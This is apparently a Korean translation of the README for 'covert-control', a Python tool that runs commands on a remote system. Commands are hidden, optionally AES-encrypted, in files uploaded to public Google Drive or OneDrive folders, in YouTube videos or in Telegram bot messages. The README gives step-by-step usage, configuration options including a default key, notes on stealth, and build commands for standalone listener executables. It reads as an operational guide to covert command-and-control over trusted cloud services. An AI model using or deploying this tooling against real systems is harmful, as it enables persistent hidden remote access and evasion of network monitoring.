
Google Drive, OneDrive 및 Youtube를 은밀 채널로 사용 - Google Drive, OneDrive, Youtube 또는 Telegram에 파일을 업로드하여 시스템을 원격으로 제어
파일을 Google Drive, OneDrive, Youtube 또는 Telegram에 업로드하여 시스템을 원격으로 제어합니다. Python을 사용하여 파일과 리스너를 생성합니다. 텍스트 파일, 이미지, 오디오 또는 비디오를 생성할 수 있으며, 명령은 평문 또는 AES로 암호화하여 포함할 수 있습니다.
covert-googledrive.py - Google Drive의 공개 폴더에 파일을 업로드하여 시스템을 제어합니다.
covert-onedrive.py - OneDrive의 공개 폴더에 파일을 업로드하여 시스템을 제어합니다.
covert-youtube.py - Youtube에 동영상을 업로드하여 시스템을 제어합니다 (covert-tube에서 업데이트됨).
covert-telegram.py - Telegram 봇을 사용하여 시스템을 제어합니다.
test_files 폴더에서 예제 파일을 찾거나 generate_file.py로 새 파일을 생성할 수 있습니다:
python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]
-t (--type) [필수]: 파일 유형: "text", "image", "audio" 또는 "video".
-o (--outputfile) [선택 사항]: 출력 파일.
-c (--command) [선택 사항]: 실행할 명령어.
-e (--encrypted) [선택 사항]: 이 플래그를 추가하면 명령어를 AES로 암호화합니다.
예시:
python3 generate_file.py -t text -c "whoami" -o text.txt
python3 generate_file.py -t text -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e
공통 설정 값:
data_type (선택 사항. 기본값: "text"):
특정 설정 값:
googledrive_folder: 모니터링할 공개 Google Drive 폴더의 URL (covert-googledrive.py 용).
onedrive_folder: 모니터링할 공개 OneDrive 폴더의 URL (covert-onedrive.py 용).
youtube_channel_id: 모니터링할 Youtube 채널의 ID. 여기에서 가져올 수 있습니다 (covert-youtube.py 용).
youtube_api_key: 여기에서 애플리케이션을 생성하고 키를 생성하여 API 키를 가져옵니다 (covert-youtube.py 용).
telegram_token: 봇 토큰. BotFather를 사용하여 생성합니다. "/newbot"을 입력한 후 봇 이름(예: "botname")과 "-bot"으로 끝나는 봇 사용자 이름(예: "somethingrandombot")을 보냅니다 (covert-telegram.py 용).
telegram_username: 특정 Telegram 사용자로부터 수신된 명령만 실행하도록 사용자 이름을 지정합니다 ("@" 제외).
텍스트 파일, 이미지, 오디오, 비디오를 암호화되지 않거나 AES로 암호화하여 업로드함으로써 명령을 실행할 수 있습니다. 선택적 입력 인자는 공개 폴더 URL이며, config.py에서도 설정할 수 있습니다:
python3 covert-googledrive.py [FOLDER_URL]
리스너는 기본적으로 300초마다 Google Drive 폴더를 확인합니다 (config.py에서 업데이트 가능). 이 경우 비디오 "video.avi"가 업로드되며, 명령어는 비디오의 QR 코드에 포함됩니다:

폴더에 새 파일이 업로드된 것을 감지하면 다운로드, 처리 후 명령이 실행됩니다:

텍스트 파일, 이미지, 오디오, 비디오를 암호화되지 않거나 AES로 암호화하여 업로드함으로써 명령을 실행할 수 있습니다. 선택적 입력 인자는 공개 폴더 URL이며, config.py에서도 설정할 수 있습니다:
python3 covert-onedrive.py [FOLDER_URL]
리스너는 기본적으로 300초마다 OneDrive 폴더를 확인합니다 (config.py에서 업데이트 가능). 이 경우 오디오 "audio_encrypted.wav"가 업로드되며, 명령어는 AES로 암호화되어 있습니다:

폴더에 새 파일이 업로드된 것을 감지하면 다운로드, 처리 후 명령이 실행됩니다:

참고: 폴더에서 파일을 삭제하지 않아야 작동합니다. 삭제할 경우 새 폴더를 만들어야 합니다. 파일을 삭제해도 작동하도록 구현할 수는 있지만, 많은 요청이 필요하고 은밀성이 떨어집니다.
비디오를 암호화되지 않거나 AES로 암호화하여 업로드함으로써 명령을 실행할 수 있습니다. 선택적 입력 인자는 모니터링할 Youtube 채널 ID와 API 키이며, config.py에서도 설정할 수 있습니다:
python3 covert-youtube.py [CHANNEL_ID] [API_KEY]
리스너는 기본적으로 300초마다 Youtube 채널을 확인합니다 (config.py에서 업데이트 가능). 먼저 비디오를 업로드합니다:

채널에 새 동영상이 있는지 확인한 후 다운로드, 처리 후 명령이 실행됩니다:

Telegram 봇을 사용하여 시스템을 원격으로 제어합니다. 이 옵션은 파일 업로드를 지원하지 않지만, 명령을 평문("/cmd") 또는 AES로 암호화하여("/encrypted") 보낼 수 있습니다. 첫 번째 선택적 입력 인자는 봇 토큰이며 config.py에서도 설정할 수 있습니다. 두 번째 인자는 봇에 명령을 보낼 수 있는 단일 Telegram 사용자를 구성하는 데 사용됩니다 ("@" 제외):
python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]
리스너는 채팅의 명령을 확인하고 출력을 표시합니다:
/cmd CLEARTEXT_COMMAND
/encrypted AES_ENCRYPTED_COMMAND

sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/
pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
| data_type | 파일 유형 | 암호화 | 사용 가능 대상 | 확장자 |
|---|
| text | 텍스트 파일 | 아니요 | Google Drive, OneDrive | .txt |
| text_encrypted | 텍스트 파일 | 예 | Google Drive, OneDrive | .txt |
| image | 이미지 | 아니요 | Google Drive, OneDrive | .png |
| image_encrypted | 이미지 | 예 | Google Drive, OneDrive | .png |
| audio | 오디오 | 아니요 | Google Drive, OneDrive | .wav |
| audio_encrypted | 오디오 | 예 | Google Drive, OneDrive | .wav |
| video | 비디오 | 아니요 | Google Drive, OneDrive, Youtube | .avi |
| video_encrypted | 비디오 | 예 | Google Drive, OneDrive, Youtube | .avi |
delay_seconds (선택 사항. 기본값: 300): Google Drive 또는 OneDrive 폴더에 새 파일이 업로드되거나 Youtube 채널에 새 동영상이 게시되었는지 확인하는 간격(초).
aes_key (선택 사항. 기본값: "covert-control21"): AES 암호화 키.
debug (선택 사항. 기본값: True): 리스너에서 메시지와 타임스탬프를 출력할지 여부.